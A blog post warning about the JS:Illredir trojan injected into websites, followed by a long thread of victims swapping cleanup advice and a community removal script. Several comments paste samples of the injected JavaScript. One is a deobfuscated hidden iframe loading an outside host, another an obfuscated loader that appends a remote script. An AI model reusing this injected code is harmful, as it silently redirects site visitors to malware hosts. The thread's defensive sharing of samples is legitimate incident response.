Trojan Attack: JS:Illredir-B [Trj]

It’s 3.30am and way past my bedtime, but I feel this is extremely important and I must highlight this to everyone.

A few days ago, one of my website clients complained that the blog I setup for them on their server using WordPress could not be accessed. When I checked, it appeared to have a PHP header problem and I had no idea why it should occur, but I merely upgraded the WordPress installation and it seemed to solve the problem. Because he had that problem, I thought I had better check on all my other WordPress blogs on our own hosted servers; and they all had the same problem.

I thought that WordPress was probably having  a Christmas party and caused all WordPress blogs to fail. I didn’t have time to check if all other WordPress users had the same problem, but it was solved easily enough by upgrading the installation.

Later though the same client told me that one of their staff who was updating some things on their website (the non-Wordpress main section) discovered a Trojan called JS:Illredir-B [Trj] when she accessed their website. A brief Google search using that name unearthed nothing. I found sites quoting similar issues though.

http://www.prelovac.com/vladimir/warning-website-virus-attack

http://forum.avast.com/index.php?topic=52476.0

About the Trojan

What’s so dangerous about Trojans? Basically, Trojans are harmful software which, while it seems to be doing what you asked it to do, is busy doing other things that you didn’t ask it to do… like, sending information (credit card information, personal information, financial information, etc) secretly to other people. Or they could rewrite certain codes or links in your browsers so that you are redirected to other websites without your knowledge. For example, you may be trying to visit your bank’s website, and you do key in the website URL manually, but you are rerouted to a phishing website which looks identical because of the code rewrite in your browser.

I’m not sure about what this Trojan really does – I’m not a virus expert. If anyone knows, or when I do find out, I’ll update.

Protect Yourself

I haven’t researched enough or spoken to enough people to find out which of their antiviruses work. It’s in the middle of the night so very few people are awake. All I can say here is, I’m using AVG and this antivirus did not detect the trojan. My client himself who uses Avira also said it was not detected. I’m not here to promote any particular antivirus actually, but my client’s staff (the one who detected it) used Avast Antivirus, so perhaps this may be a good one to use.

http://www.avast.com/

How Do We Tell Which Websites Are Under Attack?

Well, in my case, all the websites I was taking care of appeared to be have been attacked. I’ve managed to fix them, but I’ll have to keep an eye on them to make sure that they aren’t attacked again.

I’d like to appeal to everyone out there to be aware of this and to help where you can. My guess is that it is possible that there are many websites out there that have been attacked, but the owners or webmasters are unaware of it. This is because the webpage does not look any different from what it usually does, and this is why it’s so dangerous! Please note that the website owners themselves may not be the perpetrators, and are victims. If you have found any website that has been subjected to the trojan attack, please help out by informing the website owner and/or webmaster right away so that action can be taken.

Here is how you can find out whether the website has been attacked:

  1. Website seems to be loading slower than usual.
  2. When the website is loading, check the status bar. If the status bar indicates that there is some traffic being routed to websites of unusual names that are not related to the current website in any way, it is very possible that the website has been attacked.
  3. The easiest way to find out is to take a look at the page source. Go all the way to the bottom. After </html>, if there is something similar to the following, it indicates that the website has been under attack. This code which appears to be gibberish may also appear anywhere INSIDE the website instead of after </html>.

trojan.gif

How to view the page source:

  • Internet Explorer: View menu > Source
  • Firefox: View menu > Page Source
  • Google Chrome: Right-click anywhere on the page > View page source
  • Opera: View menu > Page Source
  • Safari: Right-click anywhere on the page > View Source OR View menu > View source

Fixing The Websites

For those of you who own websites and would like to know how to remove the trojan, it’s easy – just remove the extra code. Not all files are affected, I’ve found that mostly the following files are affected:

  • Files named index or have the word index in them. E.g. index.html, index.php, index.htm, index_main.htm
  • Files named home or have the word home in them. E.g. home.html, homepage.htm
  • Files named main or have the word main in them. E.g. main.html, main_page.htm
  • Files named header or have the word header in them. E.g. header.php, header.inc, header_main.php
  • Files named footer or have the word footer in them. E.g. footer.php, footer.inc, footer_main.php
  • All javascript files with the .js extension. E.g. javascript.js, functions.js

All folders in your server will be affected, including the root folder, the subfolders, the subdomains, and the subfolders in the subdomains.

While some forums suggest that only Linux servers are affected, I’ve found some of my clients who use Windows servers are also affected.

I think that there are some scripts available for you to download and use on your server so that it will automatically scan and remove the code from all affected files, but I didn’t look for them because some of the other users warned that the files themselves have the virus in them. It’s tedious to remove the codes one by one, of course. What I did was to check the last modified date of the files – in my case, the files were affected on 24th and 25th December 2009. That way, I easily detected which files were modified, and I either removed the code manually or I reuploaded my local copy onto the server. It’s tedious, but I know it works.

If anyone has found anything to add to the above, please let me know by email or by commenting. This is pretty dangerous and it’s so malicious… so please be vigilant and do your bit to help out and spread the word.

One more thing I’d like to add: Don’t expect your webhosting provider to inform you or to work on the problem for you. The moment I discovered this, I wrote to all the webhosting providers that my different websites reside on to ask them to check how this could have happened, and to also ask them to inform their clients, and their responses were about the same. They asked me to choose a password that was difficult to guess, and one said I was the only account affected – and this by a company whom I bought several packages from, ALL of which had been attacked.

Zyen Hoo

Zyen is a Physics, Chemistry and Math teacher with many interests, including running and dancing. She also enjoys indulging in vanity projects such as her personal blog, and is a self-proclaimed reviewer. She is also notoriously slow in updating her blog due to her constant search for the next adrenaline rush (on top of her heavy workload at school and her freelancing projects), so she asks for your forgiveness and understanding of her very delayed updates.

  • Mike

    Below is the script removing malicious entries from all affected files. Clean one. As per article the main thing is to change the password and don't use Total Commander for FTP uploads and/or password storage. http://crafts.hopmart.pl/files/remove-js-illredir-b.php.tar.gz Mike, Cheers

  • Paolo

    This virus spread through "normal" files. When openend It will edit some of your windows start up files , so you won't be able to restart windows. But before that it will look for an ftp progam en log in on each of your sites and do the above. Not a really nice christmass present. Removing it is quite easy as stated above. Good luck.

  • zyenweb

    Mike, you're a lifesaver. Thank you so much! There was a problem with the script though but I managed to fix it myself ... and it's cleared up all the files for me. Whoo!!! Paolo, you are soooo right. What a way to end 2009 :( You are both right, I'm guessing this trojan has attacked all my websites because I have the passwords saved in my FTP program, so that's the danger. My main problem was that the antivirus I installed did not catch the virus, hence my laptop was affected ... and that's probably why my laptop slowed down considerably. I reformatted my laptop because it was driving me nuts. I learn something new everyday.

  • Mihai

    i need help with this i changed FTP passwords i used the removal tool second i reopen a disinfected file the code is back there help please

  • zyenweb

    Mihai, can I know what your website is so we can take a look? I'll do my best to help you. The script Mike gave above works for me, but I had to modify it because there was a few lines that my server couldn't process even though they look right.

  • Mihai

    i checked some of these removal files and the virus code in them is different than my virus code on my website

  • Mike

    Hi, It's really easy to modify my original script to remove virtually any unwanted code from a file. I see that website you've specified in here is already clean, however if this is not the case let me know and I will modify the script. Thanks, Mike

  • Jorge

    Dear Mike, Thanks for the script, and so many thanks to the autor of this article, this save me the life today... Day 26th of December all my websites are infected... and thanks to this i can clear it ( at least one of my webpages ) . Only one thing, when i start the script i have problems with all files by permissions : Permission denied in xxxxx remove-js-illredir-b.php on line 116 , How can i fix this??? i need to change the rights for all folders??? Regards

  • @rjen

    Thanks, I was hit as well and managed to remove the codes from alle files. $%$@#$!. Does anyone know what the virus does in Wondows exactly?

  • Dinesh

    can you help me also please? my website is http://www.institute.org.in and it is a subdomain basically,the main domain is http://www.aieeehelpline.com i have copied the script provided by you and the script is accessible at http://www.aieeehelpline.com/remove-js-illredir-b.php . please help me . i am a newbie

  • lena

    please help , i've tried everything , i've deleted the trojan file during virus scan on my pc last week, i've cleared my ftp account and reinstalled the website for the fifth time now. , i've used the above script which fixed some of the files, but avast is still flashing out warning when viewing the site.

  • Nemo

    A website I am currently working on for a friend was infected with 'JS:Illredir-B [Trj]' which my outdated NOD32 had missed but my friend had detected with Avast. There isn't much to the site yet so we manually removed the script. The file infected was 'home.html'. I have used CuteFTP to upload to the server and had the program remember the user-name and password. How was the file infected? Did the infection start from my end? Within the same day my computer received some odd message that a 'security update has been successfully installed' and my computer instantly restarted itself. No longer able to boot into windows I did a scan with hijackthis in safe mode and discovered 'siszyd32.exe', a nasty new virus, in my windows startup. I saw paoplo's post so I thought I would share this as its possible that there is a link between these two occurrences. Now, should I reinstall windows or buy a mac?

  • Libraium

    Hi, I have the same problem with my website, www . librarium . altervista . org I tried the Mike's script, but it doesn't work, it tells me: Parse error: syntax error, unexpected T_STRING, expecting T_OLD_FUNCTION or T_FUNCTION or T_VAR or '}' in /membri/librarium/remove-js-illredir-b.php on line 59 Can you help me?

  • zyenweb

    Hi everyone. Sorry for not approving your comments earlier; I hadn't checked my dashboard the past few days. In view of the many comments, I've decided to temporarily allow all comments to be approved since this is a serious issue. @Jorge - I managed to clear out my files with Mike's script without any change in permissions. The standard permissions on my folders and subfolders are 755 and the files 644. Are those your permissions too? Maybe Mike can comment to help you out on this. @rjen - I'm not sure what the trojan this... still reading up to find out more! @Nemo - I think you were infected the same way I was. All my sites which I accessed via Filezilla were infected, as I had Filezilla remember the usernames and passwords, which now obviously is a dangerous thing to do. I think it is very probably that we were infected by another website that our anti-virus did not detect, and hence affected all our websites! About your computer - perhaps you ought to consider reformatting it? Back everything up first, of course. Mac has less virus attacks, but that doesn't mean there are none. It also comes down to how comfortable you are with using Macs. I'm not sure what the price difference is where you are, but here in Malaysia, a Mac cost about 50-100% more than a PC of equivalent specs, so we'd only get a Mac if we really, really want one (and can afford it). @Dinesh - I ran the script on your website but your subdomain doesn't seem to be listed, so maybe that's why. Can you try uploading it to the root of your subdomain and then run it from there? @Lena - I accessed your website and it seems to be clean now. Are you still facing the same problem? @Libraium - I had the same problem too. What I did was I put lines 59-62 in comments (envelope them with /* and */) and then it worked like a charm. I'm not sure why those lines don't work, as they look correct; still looking into it.

  • Mike

    @All Latest version of the script so far is from 2010-01-01 23:40 and it has 4545 bytes. I tried this version on all virus mutations referenced here (basically I accessed websites, extracted the virus entry from html/js page and run my script) all above virus versions have been successfully removed by this version of the script. If something doesn't work on your website the reasons may be as follows: incompatible php version < 5.0, other virus mutation, you don't have permission (latest version of the script will report that). I will try to include version number going forward. Please check your version and if it is not the latest one try to re-download and re-run the script . When reporting errors please post first two digits of your php version (for example 5.1), script version or size in bytes and error details. @Libraium This message usually means that you're trying to run php 5 script on php 4 engine. You can try to invoke php5 command instead of just plain php command. If you have php 5 installed on the server box this should execute the php 5 engine. @Jorge Script is modifying files on the server. If you execute script manually it assumes the permissions from the user executing it. If you execute script via http it assumes permissions of your HTTP server user. In general folder write permission is not needed unless you create new files which is not the case here. All you should need is write permission to a file being healed. As far as folder permissions go you have to be able to read folders, so you can navigate the folder tree. Again you need o have write permissions to all infected files and read permission to all folders. ("You" means user executing the script via HTTP or manually)

  • Jorge

    Dear Mike, I´m executing the script via http because i don´t have rights to execute manually. Anyway... i clean all my files for my websites... but today again the virus in in all webpage... really i don´t know how can free of it... i´m thinking in change the hosting company, because i can´t clean it every 2 dates....:(

  • Jorge

    Can you give to us the last version of the script??? in the first post we can get the first version. Regards

  • Mike

    The url is the same I've only replaced the archive, so if you download it again its going to be the latest version size should be 4545 bytes. Also you have to stop using Total Commander and change your FTP password.

  • Mike

    Uploaded latest version. Please clear the browser cache before downloading: http://crafts.hopmart.pl/files/remove-js-illredir-b.php.tar.gz Let me know.

  • Jorge

    Great Mike, Finally i get ssh acess to my webserver and i can execute the script ( new version looks great ;-) ) I can view that all bad code is out of my files, but yet there is a small line there in my case : ( in the end of the php and js files ) is necessary to delete it manually??? or is enough with the deletion of script command with yous script. Thanks i will make a donation at last, in fact is less that we can do for this great script!!!!!

  • Mike

    @Jorge - I'm glad I could help. The remaining part is a commented out string which is probably some kind of a key used to generate virus (seed) or identify your website by the virus. Without the main virus code it is harmless. I did not remove it because it is hard to distinguish valid website comments from a virus entries and this might do more harm than good. I wouldn't worry too much because of this, however if you could reveal your website address or show us a sample I might be able to verify that and eventually modify the script. Thanks !

  • Jorge

    Ok Mike, You can see it in www.promotecno.es/enfermeria www.promotecno.es/cofares www.promotecno.es/asepeyo www.proyectorpro.com Thanks for your help & Regards! P.D i will hope that not enter again this virus.. ;-)

  • Aidee

    Hi Mike.. Thanks a lot....My website has been attacked too...I used the script to remove the trojan and now it looks fine... Thanks again :)

  • Mike

    Nice to hear this ! Uploaded version 0.93. Fixed some ajax issues and directory permission issues. Have fun :P

  • helio

    Hi Guys How do i run the file: remove-js-illredir-b.php.tar to remove the virus? I have tones of files and dont want to do it manually :(

  • helio

    I worked it out. Unzip, upload, run and removes the issues. Thanks a million :)

  • Randy

    I am getting this - it isnt correcting any files, any ideas why. PHP version: 5.2.9-2 Starting ... Cannot open directory ./ASP Compiled Templates Cannot open directory ./History Files processed: 2 Files fixed: 0

  • Mike

    It looks like user running the script has no permissions to navigate those folders. Is is a Windows server ? Does anybody have asp files infected ? The script currently fixes php, htm, html, js files but not asp files. This can be easily changed just e-mail me samples. My e-mail is specified on the contents tab. Thanks!

  • Mike

    I should be on the contact tab :)

  • Janine

    Hello, My site has also been affected and I've taken it off line. I haven't read all the messages or instructions but will try the script tomorrow. @Nemo my netbook was also infected with Security Tool Malware. I was able to remove it with instructions from: http://www.bleepingcomputer.com/virus-removal/remove-security-tool. Thanks for all the information. I'll let y'all know how it goes. jwb

  • Randy

    Sorry Mike, no asp files infected but it didnt correct any files either. I did correct some files i found but I didnt think it was all of them.

  • Jorge

    Is "easy" to clean manually ( take a long time ) you only need to see the time and date for the modified files ( all files are modified more or less at same time ) , then if you find a modifie file, make a search for last time of modification and you can see easily the files modified. Regards

  • Jon

    Hi... I'm facing the same issue as well.. but according to the virus scanner, I was infected with the JS/TROJANDOWNLOADER.AGENT.NRL.TROJAN. Mike, do you have a file for this? Regards

  • Muki

    Hi ppl, thx for comments. really apreciate it. I have downloaded Mike's script, and when I started it, firsty, it said "Parse error: syntax error, unexpected T_STRING, expecting T_OLD_FUNCTION or T_FUNCTION or T_VAR or ‘}’ in /membri/librarium/remove-js-illredir-b.php on line 84". I put lines 84-87 in comments, and after that, nothing happend, only blank screen. Of course, server use PHP 4.3.1 version and is there any solution for this kind of problem?? Best Regards,

  • mache

    hi i also got this virus and i've been working on cleaning the mess for days. and i just found this information. i got the script. THANKS! just... i don't really know how to run it. i unzipped and i read the instructions, but they are not clear. (sorry, i'm not a programmer, and i have not much experience on websites, and this is scaring me a lot to try to find it out playing options of how to make it work) would you please tell me how to run the scritp. and again... thanks thanks thanks a lot! for all the info, the help, and the support.

  • Tom Colvin

    I've been fighting this infection since 31 Dec. I was noticed by WinPatrol that siszyd32 was trying to get into my start up folder. My blog site administrator has managed to clean out a lot of the infected plug-ins and the /js/ folder, and I've reformatted my HD and upgraded to Win 7. I've also switched to Avast, and it now alerts me of a Trojan [the JS one] whenever I try to write a new blog post or page, or even edit a past page. I've posted about this virus on the Word Press Forum, and the moderator responded, saying he's referred this problem to the WP Security team. Hopefully, we'll have an "official" response from WP soon. The support people at Hostgator intimate that they are getting a lot of "script injections" recently. They've been responsive and helpful -- but my problems are still not resolved.

  • mache

    hey! i just went for it. and i did it. ran it. cleaned it. i'm going to go out to party to celebrate it's done. and we survived it. THANK YOU!!!!!!!!

  • Mike

    @Muki You need PHP5 to run the script hence the message. Brief instructions Download the script http://crafts.hopmart.pl/files/remove-js-illredir-b.php.tar.gz, unzip to root folder of your website. Access the script http://yoursite.com/remove-js-illredir-b.php, click start. If all went ok remove the script. Otherwise correct the file permissions (or other errors the script has reported) and re-run the script (to re-run click start tab then click start button again)

  • Mike

    @Georgi please give me the url

  • Georgi

    www.gamezspot.net this is the Url.

  • zyenweb

    @Georgi I had to delete your earlier comment with the JS trojan because it was loading the trojan into my Administrative panel.

  • Georgi

    How to fix my website i try .php file but they don't work for me ?

  • Georgi

    Avast detects virus as JS:Illredir-C [Trj] not B version.

  • @rjen

    Maybe redundant info, but I thought I'd leave the message here anyway: MAKE SURE TO CHANGE YOUR FTP PASSWORD(S) After cleaning the mess manually I forgot to do this, and even though my PC is clean, the next day my sites were infected AGAIN. So the trojan really tries again from remote source with the stole password! After changing the passwords (which I should have done immediately of course) all stays well...

  • Mike

    Uploaded version 0.94 http://crafts.hopmart.pl/files/remove-js-illredir-b.php.tar.gz url stays the same. Clear browser's cache before downloading and verify that you've actually downloaded version 0.94. This version supports both IllRedir-B and IllRedir-C. Also fixed some minor issues. Thanks, Mike

  • akire

    I fix it with “Mass Text Replacer” download trial… -add all files -from 1 suspicious file copy virus code -in program looking for “code” and replace with “” or ” ” -done

  • Jeff Namnum

    @Mike, I so love you right now ;) I'm not sure if you wrote the original file I used when ths happened (remove-virus.php) but this new one is fantastic. The gui and the fact that it ran thru every subdirectory is amazing. I can't believe how much of this crap virus I missed by cleaning manually. THANK YOU!! @zyenweb, thanks for hosting this converation and taking up your time and bandwidth to host this conversation and make it easy for us to find the solution we need. THANK YOU!!

  • sean walsh

    I found it on a link to buy tickets to see THE NEW MASTERSOUNDS who are absolutely fantastic band on Facebook. I doubt very much they have anything to to with fraud though... I also have Avast.

  • zyenweb

    @Jeff No problem - I don't mind hosting the conversation as long as it helps people out there! And I'm so glad it did. This trojan is one pain in the neck! A million thanks to Mike, his script is a life-saver :)

  • cenzi

    http://takingflightinternational.com This is amazing. you guys are so ahead of anyone right now. I looked and looked everywhere for this info. great website too btw! I ran into a major issue. First, the fact that the last wordpress update forced me to get php5. I wasn't aware that 1and1.com did not update for me. I was stuck in the same php4 database since I signed up. So I installed phpmyadmin myself and am now running the database with php5 from there. My problem is that the root is still under php4. sooo.. what I did was move ALL The files from the website under root/phpmyadmin/check to check for viruses... but all I get is this: Running... PHP version: 5.2.12 Starting ... processed: 353 Files fixed: 0 and nothing more. any suggestions?

  • cenzi

    oops.. here it is: http://takingflightinternational.com/phpmyadmin/remove-js-illredir-b.php as opposed to http://takingflightinternational.com/remove-js-illredir-b.php where it gives me the php4 error...

  • Mike

    I just checked your home page and my script was able to fix your virus version which looks like IllRedir-C. You must have not copied your infected files in the correct spot. Infected files must be the same or a subdirectory of where the script is. For example if you place your script undec ~/public_html/remove-js-illredir-b.php, you should place your other websites under: ~/public_html/website1, ~/public_html/website2, ~/public_html/website3 ... this way script will fix all of them at once. In your case you have to place the script as oot/phpmyadmin/remove-js-illredir-b.php. Hope this helps.

  • Mike

    Posting again here: Below is the script removing malicious entries from all affected files. It removes IllRedir-B and C entries. Please read instructions before executing the script. http://crafts.hopmart.pl/files/remove-js-illredir-b.php.tar.gz Good luck, Mike

  • Zyenweb

    WARNING, PEOPLE! These trojans are mutating faster than we can keep up. There's a mutation of this trojan called "Illredir-D [Trj]" which I just found out about today. My AVG Free didn't pick it up, but Avast did. @Mike - The script isn't able to clean this out on the site I tested, so I had to make some mods but I daren't post it here in case the mods I made are not correct. This trojan is really getting on my nerves!!! On behalf of everyone here, I'd like to thank both of you who wrote this script so very, very much for taking the time and trouble to create this script and to present it so neatly so that beginners are able to use it quite easily. Also, thank you for putting a link to this page. You're a godsend!

  • Mike

    Guys give me a link to a site infected with IllRedir-D and I will modify the script I will also add an option to clean any arbitrary code from those files.

  • Atanas

    Hi I just found this page looking for solution how to remove JS:Illredir-D [Trj] that I found today in my hosting. My hosting provider said nothing important about that so I started to look in google. I have a hosting with 3 web sites on it and I suppose that all of them will be affected - www.jivdom.info, www.lotrobg.org, www.vegebg.org. Do you have a solution, guys?

  • valdes

    I send you a link to a website that contains a trojan JS:Illredir-B [Trj]. www.admcourt-varna.com

  • Mike

    Don't see anything wrong with this website was it cleaned up already ?

  • Broom

    Hi Mike, Thanks so much for helping out. I copied the script over to my root directory, but I get a PHP error when I try to run it. The url is: http://www.broombox.com/remove-js-illredir-b.php The error I get is: Parse error: syntax error, unexpected T_STRING, expecting T_OLD_FUNCTION or T_FUNCTION or T_VAR or '}' in /home/broom6/public_html/remove-js-illredir-b.php on line 84 I also tried it in this url: http://www.broombox.com/wp-content/plugins/remove-js-illredir-b.php And get the same Parse error. Thank you so much. Broom

  • Tim

    Hi Mike, I have just removed JS:Illredir-D [Trj] from my solarwarwarmair.com site but it rooted deep into my main site www.solosol.net try this link: http://www.solosol.net/catalog/index.php I am using (was) using AVG and NOD32 on another computer. A customer using 'AVAST' reported it to me yesterday. I changed to AVAST and found JS:Illredir-D [Trj]! Any help greatly appreciated

  • ekimneems

    Does anyone know exactly how this trojan spreads? I used the script to clean all files on all my sites, but it somehow keeps creeping back. It looks like everyone agrees that the source is via FTP, but what is actually injecting the code? Also, if a server has been completely cleaned an an updated antivirus client like Avast or NOD32 is installed, will it catch the trojan before it injects any code or only after those JS files have been created? Thanks!!

  • Mike

    You need to change your FTP passwords. And don't use them with TotalCommander and some other ftp clients with none or very poor encryption

  • Jim

    I've run into this issue on every one of my wordpress sites. The only thing I could think of at the time was to go into my Dashboard and re-install WP 2.9.1 .... will this alleviate the issue? Or will it continue to come back up? I use FileZilla to access my server, but have not physically typed my passwords in quite some time. Instead I have it set up through the program so all I have to do is select the server to login. I could use some help on this. Thank you.

  • Proudcdn

    Hello Mike, Fantastic resource for all of us suffering through this crap. I am stuck on a linux hosting server running PHP version 4.X (Go DaddY). Is there any script that I can run to clean my sites? One such site is http://spmabc.com I have about 6 other sites that are infected too. Sincerely, Sean

  • Mike

    I will try to port the script, so it runs on PHP4 too. There is a new mutation it starts with /*Exception*/ i will include it in new version. Please, wait for my next post.

  • MIke

    Done http://crafts.hopmart.pl/files/remove-js-illredir-b.php.tar.gz version 0.96 - Supports PHP 4! - Backups file before modification - Contains cure-fix for all files infected with IllRedir-B, IllRedir-C, IllRedir-D, IllRedir-E Let me know if you're having any issues with this release. Thanks !

  • Proudcdn

    Hello, The script being added to my sites now looks likes this: try{window.onload=function(){document.write('voila-fr.gamespot.com.uol');Izvperx7vl4q = document.getElementById('megaid').innerHTML + '-))c@#$o$m(-#(b^!r$.@&#()s)#)@u@&$^#p@ It does not have the GNU or Exception in front. Any chance the removal tool could be written to deal with this? It currently skips it. Thanks, Sean

  • Mike

    I need an url or samples if you guys want cure

  • Proudcdn

    Ok so I am 99.9% certain that the trojan once introduced to your computer invades your FTP client and grabs the log in and password info for your sites. This is how it is able to continually reappear even after you delete and clean install your site.

  • Cheeko

    I use filezilla, i think its not the ftp client but the trojan at the clients pc.

  • Mike

    Uploaded version 0.99 http://crafts.hopmart.pl/files/remove-js-illredir-b.php.tar.gz - restores chmod to 444 - added latest virus mutations

  • Hanok

    Hi Mike, Could you be more specific with what permissions need to be changed when running the script from html? The script file has permissions of 7-5-5. I've also tried the command line. For example, http://jewsandjoes.com/remove-js-illredir-b.php is where I have uploaded the file. Hosted with BlueHost, using CPanel. Have cronjobs, but it fails using the commandline you've given with error: Status: 404 Not Found X-Powered-By: PHP/5.2.11 Content-type: text/html No input file specified.

  • yousf

    I traced the trojan back. It expand tp the following code var today=new Date(), expires=new Date(today.getTime()+2678400000); if(navigator.appVersion.indexOf("MSIE 6")!=-1&&document.cookie.indexOf("_mlsdkf=s")==-1) { ifrm=""; if(today.getTimezoneOffset()==-1) {ifrm=0} document.write(ifrm); document.cookie="_mlsdkf=s;"+" expires="+expires.toGMTString()+"; " }

  • yousf

    var today=new Date(), expires=new Date(today.getTime()+2678400000); if(navigator.appVersion.indexOf("MSIE 6")!=-1&&document.cookie.indexOf("_mlsdkf=s")==-1) { ifrm=""; if(today.getTimezoneOffset()==-1) {ifrm=0} document.write(ifrm); document.cookie="_mlsdkf=s;"+" expires="+expires.toGMTString()+"; " }

  • yousf

    the ifrm has this value = "iframe width=1 height=1 src='http://seccatm.net/b2b/' style='display:none'"

  • Mike

    @Hanok - this is because you have Joomla installation. Try to rename your .htaccess file.Then run the script and then restore .htaccess file back. If you don't have .htaccess file then you have to temporarily comment out the place where you're doing url rewrites. As far as permissions go you have to have write permissions to all infected files (for apache user or other http user configured by your hosting company) it usually means 0777, the script will try to restore it back to 0444 but unless your files are owned by apache user it wont be possible. First run the script it will tell you which files are infected. Then chmod them 0777, run the script again. If the files are owned by apache user (or other http server user) script will fix them and restore to chmod 0444. Otherwise you will have to restore chmod 0444 on those files.

  • Josh

    Think there might be a new mutation of this. A client site of mine got hit with the following on 2/9/2010. var gb='';var gg='';this.lf="";var _=window;var _j;if(_j!=''){_j='k'};this._x=false;var t=document;var i='sEc7rEiEp:tE'.replace(/[E7v:&]/g, '');var ir;if(ir!='' && ir!='y'){ir=''};var td;if(td!='' && td!='c'){td=''};var x;if(x!='yz' && x != ''){x=null};_.onload=function(){var _ba;if(_ba!='ji' && _ba != ''){_ba=null};try {o=t.createElement(i);var vv=false;o.src='h&t%t%p&:?/Y/Yt&u&b3e%8Y-Yc3o%mY.3s?k%y3s3p&o?r&t%s?.3c3o3m&.&hYu?r3r?iYy&eYt?-%c&o3m%-&tYr?.?b3e3s?tYn%eYw3h?aYv3e3n&.3r&u%:?830?8&0?/%pYc?a&uYt3o?.3c%o3m%.3cYn?/%p3c3a?u3t&o3.%c&o3m?.?c?n?/%l?oYv?e32&1Yc?n3.?c&o3m?/3g3oYo?g?l3eY.&c&o?m%.3s?g3/3gYo&o3g%l&e%.&c&o?m3/%'.replace(/[%3?&Y]/g, '');var yj;if(yj!=''){yj='ea'};var kd='';o.setAttribute('dpe5fpe_rC'.replace(/[C_p56]/g, ''), "1");this.zo="zo";this.oe=40788;var vr;if(vr!='' && vr!='ifs'){vr=null};t.body.appendChild(o);} catch(oz){var n='';};};

  • Sandun

    Hi I just found that my site is infected by JS:Illredir-K [Trj]. It is detected by Avast 5. Does anyone have a modified tool for remove this virus! Because ver. 0.99 is not useful any more. Thanks

  • Georgi

    Hello, This virus infect my website again and now is the version Q.

  • Jaakko

    And we have IllRedir on forums.. cannot get rid of it. first we had Illredir-S and after several cleanups, it mutated to version W it puts in each index.php and .js file a script .. after cleanup it returns with different variables.... all in 1 line (similar to Johs's comment..) var s;if(s!='Ya' && s!='q'){s='Ya'}; ... var B=i('/7s7uXi7tSe31S071S.Xc3oSmX/SsXuXi3t7eS13031X.7cXo3mS/3o3rSbXi7tSd3o3wSn3lXoXa3d7eXr3.3c7oSmX/SgXo7o3g3lSeS.7cXoSmX/SvSeSoSh7.7c3oSmS.Sp3h7pS',"7XS3");var J=i('hKtZtZpZ:Z/K/ZmKlKbZ-KcZoKmZ.ZnZeZtZlKoZgK.KcZoKmZ.KdZeKtZiZkZnZeZwKsK-KcKoZmK.KjZeZrKsZeKyKhZoZmZeKsZiZtZeK.KrZuZ:Z',"KZ"); ... {Ig=null}; There's a secret url and path in those variables.. browsers tries to connect to the site, whatever it is doing :S

  • Gumba

    Looks like I'm on version S, what the heck do I do to remove this?

  • Andrew

    Hi Mike, When trying to start the script with 755 I got such error. Running... PHP version: 4.4.9 Starting ... Files processed: 6405 Files fixed: 0 When using 777 I'm getting Internal Server Error 404. I'm using Joomla, htaccess files were renamed. Can u recommend something? Kind regards, Andrew

  • Mike

    Version 1.0 is out. Should fix most of the latest versions however if you're doing something similar to the virus code your code may be removed too. The script is creating backup copies so if something doesn't work after your run the script keep the script output log and restore from the backups. @Andrew Try to use latest version , also don't chmod 777 the script itself just other files. Some php servers wont run the script with write/execute permissions

  • LuisTim

    hi guys, I had this virus in my site and with Mike script I cleaned him and worked fine until now. Now I think that I have a new virus, because Mike script isnt clean my website… he cleaned some files but the website continues with virus :( Can someone tell me If is the same virus? My site is: http://www.filmes-terror.com I am using ESET NOD32 and he show me that virus name is: JS/TrojanDownloader.Agent.NSM trojan I installed AVAST in other PC and he show me that virus name is: [L] JS:Illredir-W [Trj]

  • Hatem

    Hi everyone, the same as LuisTim said I had the same virus in my site, and it had changed many of things in my pages first of all I noticed that the buttons of the text editor of my forum (I use vbulletin) got frozen.. they give no action after clicking them, I thought my browser hanged or something then I opened my site from another PC and it is the same, and when I opened my forum control panel I found it not working properly, I mean when I click "submit" for something, it doesn't submitting, the same problem of the text editor happened to other 2 applications I use After getting a backup of my website on my PC, the NOD32 antivirus notified me that many files (most of them are index files as Mike said) are infected with ((js/trojandownloader.agent.nsm trojan)), and gave me 2 options: 1- Delete, 2- Rename (just renaming it from index.html to index.vhtml) these infected files are modified in march 1, 2010 Can anyone help??? P.S I'm running the script for more than 30 minutes ago and it just says: Running... PHP version: 4.4.9 Starting ... Is that normal?? thank you in advance best regards Hatem

  • Barak

    My sites all starts to fall for this shit virus .... I cleaned it out by hand the files first, but still in some days they just all come back from somewhere. Apart from Avast there is not any antivirus even recognizing something is not okay. My version is mutated to Z already ... . What should I try to get rid of it? ... Did anyone get really completly rid of it? How did you make that happen? Thanks for your attention, B.

  • florencia

    I'm from Argentina, I have my pages with this virus and really do not understand anything of what you are talking about. Can you help solve it? examples: www.susanajust.com.ar www.puntopizza.com.ar

  • Steve

    Hi I have JS:Illredir-Y [Trj] trojan on a website running Joomla and detected by avast. Any fix for that ? Thanks a lot

  • Hatem

    (((((( HERE IS THE SOLUTION )))))) 1- Download your entire site 2- Open an infected index file, you will find a strange code at the end of the page, COPY it and paste it in a text file 3- Using your HTML editor (I'm using DreamWeaver), use the "find and replace" option to search for the code in the entire site and replace it with a "space" for example, that's how you'll get rid of all the infected files in a few seconds 4- Delete all the files from your site (AFTER GETTING A BACKUP in case if anything goes wrong) 5- Upload your cleaned files PLEASE NOTE: 1- This damn virus may damage some files, so you may notice some functions are not working properly after cleaning up, because all what we did is that we removed the code, but the virus didn't only put the code be it also edited (damaged) some files, so if you noticed that some functions are not working properly, you will have to compare your files with the original files for example, in my forum (VBulletin) I had to replace the files in the "clientscript" folder with the original files that came with the forum when I bought it ... because the text editor and some other functions in the admin control panel were not working 2- The Virus may use 2 codes, I think there was a different code in the javascript files (.js) so after cleaning up, don't forget to open a javascript file (.js) to check if there is another code. if so, use the same steps to clean 3- After you finish, go to safeweb.norton.com and register to check your site, the site will tell you that your site is queued for checking, and it gonna be checked quickly (my site was checked after a few hours) THAT'S IT And, one thing I have learned from this virus, to get a backup of my site everyday Best Regards :) Hatem Tawfik BokraLena.com

  • LuisTim

    hi Hatem, thank you for your solution... It gives more work but I think that I will try. I only have one doubt... When I tried to download my site, my antivirus dont let me... because he detects virus in the files. My question is: It is safe to disable antivirus to download site? I dont got infected by open the files? Thank you

  • Barak

    HI Hatem, Thank you for your answer. Actually I was already trying this, but my problem was that all the .js files seemed to be infected, or at least that is what avast tells me while downloading all the files. When I wanted to clean them, it did not clean it, only quarantine it. Do you know any solution for this? Thank you for your attention, B.

  • Hatem

